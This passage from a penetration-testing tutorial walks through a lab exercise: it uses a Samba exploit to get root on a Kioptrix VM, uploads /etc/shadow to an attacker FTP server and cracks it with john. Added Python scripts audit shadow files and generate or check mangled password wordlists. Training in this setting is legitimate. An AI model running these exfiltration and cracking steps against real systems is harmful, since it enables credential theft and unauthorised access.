Passwords – something you know…

In this day and age, one would assume that all systems use multifactor authentication. Unfortunately, that is not the case. Even so-called "secured networks" still run protocols that send passwords in clear text, rely on insecure encryption protocols, and more. One basic skill (basic as in chess: easy to learn and difficult to master) that every pentester should attempt to master is the art of password cracking. We will start off with a few simple examples to solidify the concept and then move on to some of the strategies used by the very best in the field.

Cracking the hash

Passwords are often reused by busy users and even administrators. Regardless of how important a system is on the network, once you gain access to the password hashes they should immediately be cracked and added to any dictionary file you have in place. This could potentially save a lot of time.

First, we need to pull some files from the victim machine. Start up your Kali and Kioptrix Level 1 guest machines, run the exploit you previously compiled, and pull the passwd file down so that we can run John against it.

  1. Start all necessary virtual devices in your lab (Kali and Kioptrix).
  2. Run ./SambaVuln10 -b 0 192.168.75.14.
  3. You are now connected as root on kioptrix.level1.
  4. Open a new terminal session and start pure-ftpd on your Kali guest machine.
  5. In the shell that is connected to the Kioptrix machine, use FTP to connect to your FTP server on the Kali machine.
  6. Move to the /etc directory. Remember that you will not receive much feedback from the victim machine:
    cd /etc
    ls
    
  7. You should see a directory listing of the Kioptrix /etc directory. Connect to the FTP server:
    ftp 192.168.75.12
    
  8. Type in the user name we created on the FTP server on the Kali machine:
    (ftplogin)
  9. Enter the password for the FTP server account:
    Password: password
    
    Wait a moment or two and type:
    put shadow
    
  10. Wait a few more moments and type:
    ls
    exit
    

    You should see a directory listing of the target FTP site.

  11. CTRL + Q will get you out of the Kioptrix machine.

    Tip

    You could have also simply performed a cat shadow command and copied the screen output with your mouse. Knowing how to pull files from your target machines is very important, especially if the files are very large.

Now that we have the shadow file on our Kali machine, let's see what we can do with it.

We can launch john against our Kioptrix shadow file:

# john /var/public/shadow

John will start to attempt to brute-force the MD5 passwords.

Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/64 X2])

Tip

If you are lucky or extremely patient, you will be rewarded with the unencrypted passwords for the target machine. Depending on the password complexity used combined with the speed of your system, this step could take anywhere from minutes to weeks to complete. There are third-party services available that can be used to crack passwords but using these would have to be specifically permitted within your rules of engagement as you lose control of any data sent to a third party.
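Before handing a shadow file to john, it is worth knowing what is in it: which accounts carry a hash john can actually load, how many distinct salts there are (john reports both, as in the "Loaded 3 password hashes with 3 different salts" line above), which accounts are locked or have no password at all, and which still use the cheap md5crypt ("FreeBSD MD5") scheme. The following Python script is an added example, not code from the book; the shadow lines it parses are constructed placeholders, and the scheme table covers only the common modular-crypt identifiers.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample shadow file for this example. The hash strings are
# placeholders of the right shape, not real password hashes from any system.
SAMPLE_SHADOW = """\
root:$1$abcdefgh$0123456789abcdefghijkl:15000:0:99999:7:::
john:$1$saltsalt$ABCDEFGHIJKLMNOPQRSTUV:15000:0:99999:7:::
harold:$6$rounds=5000$longsaltvalue$placeholderSha512CryptDigestValue:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
sshd:!:15000:0:99999:7:::
guest::15000:0:99999:7:::
"""

# Modular crypt format identifiers ($id$...) and the scheme each denotes.
CRYPT_IDS = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}
# md5crypt (john's "FreeBSD MD5") and traditional DES crypt are cheap per guess;
# accounts still using them are a finding in their own right.
WEAK_SCHEMES = {"md5crypt", "descrypt"}


@dataclass
class ShadowEntry:
    user: str
    hash_field: str
    scheme: Optional[str]   # None when there is no usable hash at all
    salt: Optional[str]
    locked: bool            # "!" or "*" prefix: password login disabled
    empty: bool             # empty field: no password is required


def parse_entry(user: str, field: str) -> ShadowEntry:
    empty = field == ""
    locked = field.startswith(("!", "*"))
    core = field.lstrip("!*")        # a locked account may still carry its old hash
    scheme = salt = None
    if core.startswith("$"):
        parts = core.split("$")      # ['', id, ('rounds=N',)? salt, digest]
        scheme = CRYPT_IDS.get(parts[1], "unknown(" + parts[1] + ")")
        rest = [p for p in parts[2:] if not p.startswith("rounds=")]
        if len(rest) >= 2:
            salt = rest[0]
    elif len(core) == 13:
        scheme, salt = "descrypt", core[:2]   # traditional DES crypt: 2-char salt
    return ShadowEntry(user, field, scheme, salt, locked, empty)


def parse_shadow(text: str) -> list:
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            entries.append(parse_entry(fields[0], fields[1]))
    return entries


def audit(entries: list) -> dict:
    # "live" hashes are the ones a cracker would load: a real digest, not locked.
    live = [e for e in entries if e.scheme and not e.locked]
    return {
        "loadable": [e.user for e in live],
        "distinct_salts": len({e.salt for e in live}),
        "weak_scheme": [e.user for e in live if e.scheme in WEAK_SCHEMES],
        "no_password": [e.user for e in entries if e.empty],
        "locked": [e.user for e in entries if e.locked],
    }


if __name__ == "__main__":
    report = audit(parse_shadow(SAMPLE_SHADOW))
    for key, value in report.items():
        print(f"{key:15} {value}")
```

On the sample above the report lists three loadable hashes with three distinct salts, two of them md5crypt, one account with an empty password field and two locked accounts. The distinct-salt count matters because a salted scheme forces a cracker to hash every candidate once per salt, so three salts triples the work of a dictionary run; the empty field and the md5crypt entries are what a defender should fix first.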

Brute-forcing passwords

Brute-forcing is still a very viable method of gaining access to a machine. The problem with passwords is that people have to be able to recall them at will. Trying to remember 233!sdsfF_DaswsaWlsc!!&$#_ would be difficult for most, and thus we end up with a short list of commonly used passwords such as ILoveLore1!. The problem with this is that there are several methods of narrowing down the list of possible passwords, and that even a home desktop now has as many as eight processor cores.

Tip

Password cracking can be accomplished using multiple video cards and their GPUs. This is the preferred method if the resources are available. At the time of writing, the team at hashcat had the fastest password cracker at 8 million attempts per second. You can find more here http://hashcat.net/oclhashcat/.

Although the password ILoveLore1! would meet numerous enforced password policies, you could easily make a list of passwords that appends commonly used characters such as !, 1, 2, and so on to each base word. If you are clever about how you are creating your word lists, placing commonly used terms such as ILove, Iam, and so on in front of each word would make the rest simple. Modern password brute-forcing techniques would tear this password up in mere moments. This makes cracking passwords faster and easier than ever.
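The rule-based approach described above can be shown from both sides: generating the mangled candidates (prefix + word + suffix characters) to see how small that list really is, and running the same rules backwards as a password filter so that a password like ILoveLore1! is rejected even though it satisfies the usual complexity policy. This Python script is an added example, not code from the book or from any cracking tool; the prefix, word and suffix lists are constructed and deliberately tiny, and `keyspace_ratio` compares against an assumed 95-character printable alphabet.

```python
import itertools

# Constructed lists for this example; real rule sets and dictionaries are far larger.
PREFIXES = ["ILove", "Iam", "My"]
BASE_WORDS = ["Lore", "Kali", "Summer", "Password"]
SUFFIX_ATOMS = ["!", "1", "2", "123", "2012"]


def mangle(base_words, prefixes, suffix_atoms, max_suffixes=2):
    """Yield every [prefix]word[suffix atoms] combination, with up to
    max_suffixes atoms appended, in a stable order."""
    for word in base_words:
        for prefix in [""] + list(prefixes):
            for n in range(max_suffixes + 1):
                for combo in itertools.product(suffix_atoms, repeat=n):
                    yield prefix + word + "".join(combo)


def build_wordlist(base_words=BASE_WORDS, prefixes=PREFIXES,
                   suffix_atoms=SUFFIX_ATOMS, max_suffixes=2):
    # dict.fromkeys drops duplicates while keeping generation order
    return list(dict.fromkeys(mangle(base_words, prefixes, suffix_atoms, max_suffixes)))


def meets_naive_policy(pw: str) -> bool:
    """The usual 'complexity' rule: 8+ chars with upper, lower, digit and symbol."""
    return (len(pw) >= 8
            and any(c.isupper() for c in pw) and any(c.islower() for c in pw)
            and any(c.isdigit() for c in pw) and any(not c.isalnum() for c in pw))


def _strip_suffixes(pw, atoms, budget):
    """Yield pw and every stem reachable by peeling off up to `budget` atoms."""
    yield pw
    if budget == 0:
        return
    for atom in atoms:
        if pw.endswith(atom) and len(pw) > len(atom):
            yield from _strip_suffixes(pw[: -len(atom)], atoms, budget - 1)


def matches_mangling_rules(pw, base_words=BASE_WORDS, prefixes=PREFIXES,
                           suffix_atoms=SUFFIX_ATOMS, max_suffixes=2) -> bool:
    """Run the rules backwards: strip known suffixes, then a known prefix,
    and report whether a dictionary word is left. A password filter can run
    this check without ever materialising the wordlist."""
    bases = set(base_words)
    for stem in _strip_suffixes(pw, suffix_atoms, max_suffixes):
        forms = [stem] + [stem[len(p):] for p in prefixes if stem.startswith(p)]
        if any(f in bases for f in forms):
            return True
    return False


def keyspace_ratio(wordlist, alphabet_size=95, length=11) -> float:
    """How small the mangled list is next to exhaustive search of one length
    (assumed printable-ASCII alphabet of 95 symbols)."""
    return len(wordlist) / (alphabet_size ** length)


if __name__ == "__main__":
    wordlist = build_wordlist()
    print(len(wordlist), "candidates, ratio to 11-char keyspace:",
          keyspace_ratio(wordlist))
    for pw in ("ILoveLore1!", "233!sdsfF_DaswsaWlsc!!&$#_"):
        print(pw, "policy:", meets_naive_policy(pw),
              "mangled dictionary word:", matches_mangling_rules(pw))
```

With four words, three prefixes and five suffix atoms (up to two of them appended) the list holds 496 candidates, and ILoveLore1! is among them; both sample passwords pass the naive complexity policy, but only the random one survives the rule check. The point for a defender is that policy rules about character classes say nothing about how many guesses a password costs, while a rule-reversal check like `matches_mangling_rules` does.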

Be aware that many of the examples used in this book are simplified to make the concepts easier to learn. Once you understand the concepts, you will be able to use the very same techniques when performing on real-life networks as well.
